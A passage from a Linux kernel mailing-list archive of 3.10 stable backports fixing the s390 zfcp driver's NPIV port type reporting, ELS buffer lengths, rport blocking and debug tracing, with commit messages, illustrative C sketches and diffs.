  2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router Willy Tarreau
                   ` (188 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit bd77befa5bcff8c51613de271913639edf85fbc2 upstream.

For an NPIV-enabled FCP device, zfcp can erroneously show
"NPort (fabric via point-to-point)" instead of "NPIV VPORT"
for the port_type sysfs attribute of the corresponding
fc_host.
s390-tools that can be affected are dbginfo.sh and ziomon.

zfcp_fsf_exchange_config_evaluate() ignores
fsf_qtcb_bottom_config.connection_features indicating NPIV
and only sets fc_host_port_type to FC_PORTTYPE_NPORT if
fsf_qtcb_bottom_config.fc_topology is FSF_TOPO_FABRIC.

Only the independent zfcp_fsf_exchange_port_evaluate()
evaluates connection_features to overwrite fc_host_port_type
to FC_PORTTYPE_NPIV in case of NPIV.
Code was introduced with upstream kernel 2.6.30
commit 0282985da5923fa6365adcc1a1586ae0c13c1617
("[SCSI] zfcp: Report fc_host_port_type as NPIV").

This works during FCP device recovery (such as set online)
because it performs FSF_QTCB_EXCHANGE_CONFIG_DATA followed by
FSF_QTCB_EXCHANGE_PORT_DATA in sequence.

However, the zfcp-specific scsi host sysfs attributes
"requests", "megabytes", or "seconds_active" trigger only
zfcp_fsf_exchange_config_evaluate() resetting fc_host
port_type to FC_PORTTYPE_NPORT despite NPIV.

The zfcp-specific scsi host sysfs attribute "utilization"
triggers only zfcp_fsf_exchange_port_evaluate() correcting
the fc_host port_type again in case of NPIV.

Evaluate fsf_qtcb_bottom_config.connection_features
in zfcp_fsf_exchange_config_evaluate() where it belongs.
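
As an illustration only, the intended decision can be sketched in
standalone C. The enum names, the NPIV_MODE_FLAG value and
port_type_from_config() are hypothetical stand-ins, not the zfcp or
FC transport definitions:

```c
/* Hypothetical stand-ins for the topology and port type constants. */
enum topo { TOPO_P2P, TOPO_FABRIC, TOPO_AL, TOPO_OTHER };
enum port_type { PORT_UNKNOWN, PORT_PTP, PORT_NPORT, PORT_NPIV, PORT_NLPORT };

/* Assumed bit value, for illustration only. */
#define NPIV_MODE_FLAG 0x00000001u

/*
 * Derive the port type from the exchanged config data alone:
 * for a fabric topology, the NPIV bit in connection_features
 * selects NPIV over a plain N_Port.
 */
static enum port_type port_type_from_config(enum topo topology,
					    unsigned int connection_features)
{
	switch (topology) {
	case TOPO_P2P:
		return PORT_PTP;
	case TOPO_FABRIC:
		if (connection_features & NPIV_MODE_FLAG)
			return PORT_NPIV;
		return PORT_NPORT;
	case TOPO_AL:
		return PORT_NLPORT;
	default:
		return PORT_UNKNOWN;
	}
}
```

With this shape, a caller that evaluates only the config data already
gets the NPIV answer, so no second evaluation is needed to correct it.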

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 0282985da592 ("[SCSI] zfcp: Report fc_host_port_type as NPIV")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_fsf.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 9152999..8fa6bc4 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -3,7 +3,7 @@
  *
  * Implementation of FSF commands.
  *
- * Copyright IBM Corp. 2002, 2013
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -513,7 +513,10 @@ static int zfcp_fsf_exchange_config_evaluate(struct zfcp_fsf_req *req)
 		fc_host_port_type(shost) = FC_PORTTYPE_PTP;
 		break;
 	case FSF_TOPO_FABRIC:
-		fc_host_port_type(shost) = FC_PORTTYPE_NPORT;
+		if (bottom->connection_features & FSF_FEATURE_NPIV_MODE)
+			fc_host_port_type(shost) = FC_PORTTYPE_NPIV;
+		else
+			fc_host_port_type(shost) = FC_PORTTYPE_NPORT;
 		break;
 	case FSF_TOPO_AL:
 		fc_host_port_type(shost) = FC_PORTTYPE_NLPORT;
@@ -618,7 +621,6 @@ static void zfcp_fsf_exchange_port_evaluate(struct zfcp_fsf_req *req)
 
 	if (adapter->connection_features & FSF_FEATURE_NPIV_MODE) {
 		fc_host_permanent_port_name(shost) = bottom->wwpn;
-		fc_host_port_type(shost) = FC_PORTTYPE_NPIV;
 	} else
 		fc_host_permanent_port_name(shost) = fc_host_port_name(shost);
 	fc_host_maxframe_size(shost) = bottom->maximum_frame_size;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 70369f8e15b220f50a16348c79a61d3f7054813c upstream.

In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.

Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.

Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.

The example below is decoded with zfcpdbf from s390-tools:

Timestamp      : ...
Area           : SAN
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : zfcp_dbf_san_req+0408
Record id      : 1
Tag            : fssels1
Request id     : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info   : 52000000 00000000 <our wwpn       >           [ADISC]
                 <our wwnn       > 00<s_id> 00000000
                 00000000 00000000 00000000 00000000

Timestamp      : ...
Area           : HBA
Subarea        : 00
Level          : 1
Exception      : -
CPU id         : ..
Caller         : zfcp_dbf_hba_fsf_res+0740
Record id      : 1
Tag            : fs_ferr
Request id     : 0x<reqid>
Request status : 0x00000010
FSF cmnd       : 0x0000000b               [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued     : ...
FSF stat       : 0x00000061               [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual  : 00000000 00000000 00000000 00000000
Prot stat      : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000
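
Separately from the trace above, the length initialization that the
hardware data router case needs can be sketched in standalone C. This
is a minimal sketch under assumptions: struct sg_entry, real_bytes(),
struct support_lengths and set_ct_els_lengths() are hypothetical
simplifications, not the kernel scatterlist or QTCB types:

```c
#include <stddef.h>

/* Hypothetical, simplified stand-in for a scatterlist entry. */
struct sg_entry {
	unsigned int length;
	struct sg_entry *next;
};

/* Hypothetical stand-in for the two length fields of the request block. */
struct support_lengths {
	unsigned int req_buf_length;
	unsigned int resp_buf_length;
};

/* Sum the byte lengths of all entries in a list. */
static unsigned int real_bytes(const struct sg_entry *sg)
{
	unsigned int total = 0;

	for (; sg; sg = sg->next)
		total += sg->length;
	return total;
}

/* Initialize both lengths from the actual request and response buffers. */
static void set_ct_els_lengths(struct support_lengths *s,
			       const struct sg_entry *req,
			       const struct sg_entry *resp)
{
	s->req_buf_length = real_bytes(req);
	s->resp_buf_length = real_bytes(resp);
}
```

The point of the sketch is only that both lengths are derived from
the buffers themselves rather than left at their initial value.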

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_fsf.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c
index 8fa6bc4..8e0979c 100644
--- a/drivers/s390/scsi/zfcp_fsf.c
+++ b/drivers/s390/scsi/zfcp_fsf.c
@@ -990,8 +990,12 @@ static int zfcp_fsf_setup_ct_els_sbals(struct zfcp_fsf_req *req,
 	if (zfcp_adapter_multi_buffer_active(adapter)) {
 		if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_req))
 			return -EIO;
+		qtcb->bottom.support.req_buf_length =
+			zfcp_qdio_real_bytes(sg_req);
 		if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_resp))
 			return -EIO;
+		qtcb->bottom.support.resp_buf_length =
+			zfcp_qdio_real_bytes(sg_resp);
 
 		zfcp_qdio_set_data_div(qdio, &req->qdio_req,
 					zfcp_qdio_sbale_count(sg_req));
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 4eeaa4f3f1d6c47b69f70e222297a4df4743363e upstream.

On a successful end of reopen port forced,
zfcp_erp_strategy_followup_success() re-uses the port erp_action
and the subsequent zfcp_erp_action_cleanup() now
sees ZFCP_ERP_SUCCEEDED with
erp_action->action==ZFCP_ERP_ACTION_REOPEN_PORT
instead of ZFCP_ERP_ACTION_REOPEN_PORT_FORCED
but must not perform zfcp_scsi_schedule_rport_register().

We can detect this because the fresh port reopen erp_action
is in its very first step ZFCP_ERP_STEP_UNINITIALIZED.

Otherwise this opens a time window with unblocked rport
(until the followup port reopen recovery would block it again).
If a scsi_cmnd timeout occurs during this time window
fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents
a clean and timely path failover.
This should not happen if the path issue can be recovered
on FC transport layer such as path issues involving RSCNs.

Also, unnecessary and repeated DID_IMM_RETRY for pending and
undesired new requests occur because internally zfcp still
has its zfcp_port blocked.

As a follow-on error with scsi_eh, this can, in the worst case,
cause permanently lost paths due to one of:
sd <scsidev>: [<scsidisk>] Medium access timeout failure. Offlining disk!
sd <scsidev>: Device offlined - not ready after error recovery

For fix validation and to aid future debugging with other recoveries
we now also trace (un)blocking of rports.
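
The detection described earlier in this message (a fresh port reopen
erp_action that is still in its first step) can be sketched as a
standalone predicate. All names here are hypothetical stand-ins for
the zfcp ERP types, chosen for illustration only:

```c
#include <stdbool.h>

/* Hypothetical stand-ins for the ERP action, step and result values. */
enum erp_action { ACTION_REOPEN_PORT, ACTION_REOPEN_PORT_FORCED };
enum erp_step { STEP_UNINITIALIZED, STEP_PORT_OPENING };
enum erp_result { ERP_SUCCEEDED, ERP_FAILED };

struct erp_act {
	enum erp_action action;
	enum erp_step step;
};

/*
 * Decide whether cleanup may schedule the rport registration.
 * A non-forced reopen that has not left its first step is the
 * follow-up of a forced reopen and must not unblock the rport.
 */
static bool should_register_rport(const struct erp_act *act,
				  enum erp_result result)
{
	if (act->action != ACTION_REOPEN_PORT)
		return false;
	if (act->step == STEP_UNINITIALIZED)
		return false;
	return result == ERP_SUCCEEDED;
}
```

Only a non-forced reopen that actually ran and succeeded leads to
registration; the overwritten follow-up action is skipped.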

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 5767620c383a ("[SCSI] zfcp: Do not unblock rport from REOPEN_PORT_FORCED")
Fixes: a2fa0aede07c ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes: 5f852be9e11d ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes: 338151e06608 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes: 3859f6a248cb ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.h  |  7 ++++++-
 drivers/s390/scsi/zfcp_erp.c  | 12 +++++++++---
 drivers/s390/scsi/zfcp_scsi.c |  8 +++++++-
 3 files changed, 22 insertions(+), 5 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index 3ac7a4b..b5afa3d 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -2,7 +2,7 @@
  * zfcp device driver
  * debug feature declarations
  *
- * Copyright IBM Corp. 2008, 2010
+ * Copyright IBM Corp. 2008, 2015
  */
 
 #ifndef ZFCP_DBF_H
@@ -17,6 +17,11 @@
 
 #define ZFCP_DBF_INVALID_LUN	0xFFFFFFFFFFFFFFFFull
 
+enum zfcp_dbf_pseudo_erp_act_type {
+	ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD = 0xff,
+	ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL = 0xfe,
+};
+
 /**
  * struct zfcp_dbf_rec_trigger - trace record for triggered recovery action
  * @ready: number of ready recovery actions
diff --git a/drivers/s390/scsi/zfcp_erp.c b/drivers/s390/scsi/zfcp_erp.c
index 8e8f353..b4cd26d 100644
--- a/drivers/s390/scsi/zfcp_erp.c
+++ b/drivers/s390/scsi/zfcp_erp.c
@@ -3,7 +3,7 @@
  *
  * Error Recovery Procedures (ERP).
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -1225,8 +1225,14 @@ static void zfcp_erp_action_cleanup(struct zfcp_erp_action *act, int result)
 		break;
 
 	case ZFCP_ERP_ACTION_REOPEN_PORT:
-		if (result == ZFCP_ERP_SUCCEEDED)
-			zfcp_scsi_schedule_rport_register(port);
+		/* This switch case might also happen after a forced reopen
+		 * was successfully done and thus overwritten with a new
+		 * non-forced reopen at `ersfs_2'. In this case, we must not
+		 * do the clean-up of the non-forced version.
+		 */
+		if (act->step != ZFCP_ERP_STEP_UNINITIALIZED)
+			if (result == ZFCP_ERP_SUCCEEDED)
+				zfcp_scsi_schedule_rport_register(port);
 		/* fall through */
 	case ZFCP_ERP_ACTION_REOPEN_PORT_FORCED:
 		put_device(&port->dev);
diff --git a/drivers/s390/scsi/zfcp_scsi.c b/drivers/s390/scsi/zfcp_scsi.c
index 7b35364..38ee0df 100644
--- a/drivers/s390/scsi/zfcp_scsi.c
+++ b/drivers/s390/scsi/zfcp_scsi.c
@@ -3,7 +3,7 @@
  *
  * Interface to Linux SCSI midlayer.
  *
- * Copyright IBM Corp. 2002, 2013
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -577,6 +577,9 @@ static void zfcp_scsi_rport_register(struct zfcp_port *port)
 	ids.port_id = port->d_id;
 	ids.roles = FC_RPORT_ROLE_FCP_TARGET;
 
+	zfcp_dbf_rec_trig("scpaddy", port->adapter, port, NULL,
+			  ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD,
+			  ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD);
 	rport = fc_remote_port_add(port->adapter->scsi_host, 0, &ids);
 	if (!rport) {
 		dev_err(&port->adapter->ccw_device->dev,
@@ -598,6 +601,9 @@ static void zfcp_scsi_rport_block(struct zfcp_port *port)
 	struct fc_rport *rport = port->rport;
 
 	if (rport) {
+		zfcp_dbf_rec_trig("scpdely", port->adapter, port, NULL,
+				  ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL,
+				  ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL);
 		fc_remote_port_delete(rport);
 		port->rport = NULL;
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 35f040df97fa0e94c7851c054ec71533c88b4b81 upstream.

While retaining the actual filtering according to trace level,
the following commits started to write such filtered records
with a hardcoded record level of 1 instead of the actual record level:
commit 250a1352b95e1db3216e5c5d4f4365bea5122f4a
("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")

Now we can distinguish written records again for offline level filtering.
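
A minimal sketch of the idea, assuming a much simplified trace area:
struct trace_area, write_record() and trace_resp() are hypothetical
and only model the level handling, not the s390 debug feature API:

```c
/* Hypothetical, simplified trace area that remembers what was written. */
struct trace_area {
	int level;		/* configured trace level of the area */
	int records;		/* number of records written so far */
	int last_record_level;	/* level stored with the last record */
};

/* Write one record and store the level it was written with. */
static void write_record(struct trace_area *area, int level)
{
	area->records++;
	area->last_record_level = level;
}

/*
 * Filter on the area's level, then pass the caller's level through
 * to the writer instead of a hardcoded constant.
 */
static void trace_resp(struct trace_area *area, int level)
{
	if (level <= area->level)
		write_record(area, level);
}
```

Because the record keeps its own level, a reader of a saved trace can
filter again at a lower level without losing that distinction.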

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 250a1352b95e ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 11 ++++++-----
 drivers/s390/scsi/zfcp_dbf.h |  4 ++--
 drivers/s390/scsi/zfcp_ext.h |  7 ++++---
 3 files changed, 12 insertions(+), 10 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index e1a8cc2..8f668c6 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -3,7 +3,7 @@
  *
  * Debug traces for zfcp.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #define KMSG_COMPONENT "zfcp"
@@ -58,7 +58,7 @@ void zfcp_dbf_pl_write(struct zfcp_dbf *dbf, void *data, u16 length, char *area,
  * @tag: tag indicating which kind of unsolicited status has been received
  * @req: request for which a response was received
  */
-void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
+void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req)
 {
 	struct zfcp_dbf *dbf = req->adapter->dbf;
 	struct fsf_qtcb_prefix *q_pref = &req->qtcb->prefix;
@@ -90,7 +90,7 @@ void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req)
 				  rec->pl_len, "fsf_res", req->req_id);
 	}
 
-	debug_event(dbf->hba, 1, rec, sizeof(*rec));
+	debug_event(dbf->hba, level, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->hba_lock, flags);
 }
 
@@ -392,7 +392,8 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf)
  * @sc: pointer to struct scsi_cmnd
  * @fsf: pointer to struct zfcp_fsf_req
  */
-void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
+void zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *sc,
+		   struct zfcp_fsf_req *fsf)
 {
 	struct zfcp_adapter *adapter =
 		(struct zfcp_adapter *) sc->device->host->hostdata[0];
@@ -434,7 +435,7 @@ void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf)
 		}
 	}
 
-	debug_event(dbf->scsi, 1, rec, sizeof(*rec));
+	debug_event(dbf->scsi, level, rec, sizeof(*rec));
 	spin_unlock_irqrestore(&dbf->scsi_lock, flags);
 }
 
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index b5afa3d..97f46e6 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -284,7 +284,7 @@ static inline
 void zfcp_dbf_hba_fsf_resp(char *tag, int level, struct zfcp_fsf_req *req)
 {
 	if (level <= req->adapter->dbf->hba->level)
-		zfcp_dbf_hba_fsf_res(tag, req);
+		zfcp_dbf_hba_fsf_res(tag, level, req);
 }
 
 /**
@@ -323,7 +323,7 @@ void _zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *scmd,
 					scmd->device->host->hostdata[0];
 
 	if (level <= adapter->dbf->scsi->level)
-		zfcp_dbf_scsi(tag, scmd, req);
+		zfcp_dbf_scsi(tag, level, scmd, req);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h
index 1d3dd3f..1282165 100644
--- a/drivers/s390/scsi/zfcp_ext.h
+++ b/drivers/s390/scsi/zfcp_ext.h
@@ -3,7 +3,7 @@
  *
  * External function declarations.
  *
- * Copyright IBM Corp. 2002, 2010
+ * Copyright IBM Corp. 2002, 2015
  */
 
 #ifndef ZFCP_EXT_H
@@ -50,7 +50,7 @@ extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *,
 			      struct zfcp_port *, struct scsi_device *, u8, u8);
 extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *);
 extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_hba_fsf_res(char *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_berr(struct zfcp_dbf *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_hba_def_err(struct zfcp_adapter *, u64, u16, void **);
@@ -58,7 +58,8 @@ extern void zfcp_dbf_hba_basic(char *, struct zfcp_adapter *);
 extern void zfcp_dbf_san_req(char *, struct zfcp_fsf_req *, u32);
 extern void zfcp_dbf_san_res(char *, struct zfcp_fsf_req *);
 extern void zfcp_dbf_san_in_els(char *, struct zfcp_fsf_req *);
-extern void zfcp_dbf_scsi(char *, struct scsi_cmnd *, struct zfcp_fsf_req *);
+extern void zfcp_dbf_scsi(char *, int, struct scsi_cmnd *,
+			  struct zfcp_fsf_req *);
 
 /* zfcp_erp.c */
 extern void zfcp_erp_set_adapter_status(struct zfcp_adapter *, u32);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit 0102a30a6ff60f4bb4c07358ca3b1f92254a6c25 upstream.

Bring back
commit d21e9daa63e009ce5b87bbcaa6d11ce48e07bbbe
("[SCSI] zfcp: Dont use 0 to indicate invalid LUN in rec trace")
which was lost with
commit ae0904f60fab7cb20c48d32eefdd735e478b91fb
("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.")

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: ae0904f60fab ("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 8f668c6..394d5d4 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -234,7 +234,8 @@ static void zfcp_dbf_set_common(struct zfcp_dbf_rec *rec,
 	if (sdev) {
 		rec->lun_status = atomic_read(&sdev_to_zfcp(sdev)->status);
 		rec->lun = zfcp_scsi_dev_lun(sdev);
-	}
+	} else
+		rec->lun = ZFCP_DBF_INVALID_LUN;
 }
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Steffen Maier <maier@linux.vnet.ibm.com>

commit d27a7cb91960cf1fdd11b10071e601828cbf4b1f upstream.

Since commit a54ca0f62f953898b05549391ac2a8a4dad6482b
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
HBA records no longer contain WWPN, D_ID, or LUN
to reduce duplicate information which is already in REC records.
In contrast to "regular" target ports, we don't use recovery to open
WKA ports such as directory/nameserver, so we don't get REC records.
Therefore, introduce pseudo REC running records without any
actual recovery action but including D_ID of WKA port on open/close.
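
As a rough sketch of such a pseudo record, assuming hypothetical
field widths: struct pseudo_rec, INVALID_LUN and fill_wka_rec() are
illustrative names and do not reproduce the zfcp trace record layout.
Fields that have no meaning without a recovery action are set to all
ones so that they stand out when the trace is decoded:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical marker for "no LUN". */
#define INVALID_LUN 0xFFFFFFFFFFFFFFFFull

/* Hypothetical, simplified record; field widths are assumptions. */
struct pseudo_rec {
	uint32_t d_id;
	uint64_t lun;
	uint64_t fsf_req_id;
	uint32_t rec_status;
	uint16_t rec_step;
	uint8_t rec_action;
	uint8_t rec_count;
};

/* Fill a record for a WKA port event that has no recovery action. */
static void fill_wka_rec(struct pseudo_rec *rec, uint32_t d_id,
			 uint64_t req_id)
{
	memset(rec, 0, sizeof(*rec));
	rec->d_id = d_id;
	rec->lun = INVALID_LUN;
	rec->fsf_req_id = req_id;	/* correlates with the HBA record */
	rec->rec_status = ~0u;		/* all ones: not applicable */
	rec->rec_step = (uint16_t)~0u;
	rec->rec_action = (uint8_t)~0u;
	rec->rec_count = (uint8_t)~0u;
}
```

The request ID is the only link to the HBA record, which is why it is
carried in the pseudo record alongside the D_ID.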

Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 32 ++++++++++++++++++++++++++++++++
 drivers/s390/scsi/zfcp_ext.h |  1 +
 drivers/s390/scsi/zfcp_fsf.c |  8 ++++++--
 3 files changed, 39 insertions(+), 2 deletions(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index 394d5d4..e99b3d6 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -314,6 +314,38 @@ void zfcp_dbf_rec_run(char *tag, struct zfcp_erp_action *erp)
 	spin_unlock_irqrestore(&dbf->rec_lock, flags);
 }
 
+/**
+ * zfcp_dbf_rec_run_wka - trace wka port event with info like running recovery
+ * @tag: identifier for event
+ * @wka_port: well known address port
+ * @req_id: request ID to correlate with potential HBA trace record
+ */
+void zfcp_dbf_rec_run_wka(char *tag, struct zfcp_fc_wka_port *wka_port,
+			  u64 req_id)
+{
+	struct zfcp_dbf *dbf = wka_port->adapter->dbf;
+	struct zfcp_dbf_rec *rec = &dbf->rec_buf;
+	unsigned long flags;
+
+	spin_lock_irqsave(&dbf->rec_lock, flags);
+	memset(rec, 0, sizeof(*rec));
+
+	rec->id = ZFCP_DBF_REC_RUN;
+	memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN);
+	rec->port_status = wka_port->status;
+	rec->d_id = wka_port->d_id;
+	rec->lun = ZFCP_DBF_INVALID_LUN;
+
+	rec->u.run.fsf_req_id = req_id;
+	rec->u.run.rec_status = ~0;
+	rec->u.run.rec_step = ~0;
+	rec->u.run.rec_action = ~0;
+	rec->u.run.rec_count = ~0;
+
+	debug_event(dbf->rec, 1, rec, sizeof(*rec));
+	spin_unlock_irqrestore(&dbf->rec_lock, flags);
+}
+
 static inline
 void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len,
 		  u64 req_id, u32 d_id)
diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h
index 1282165..01527c3 100644
--- a/drivers/s390/scsi/zfcp_ext.h
+++ b/drivers/s390/scsi/zfcp_ext.h
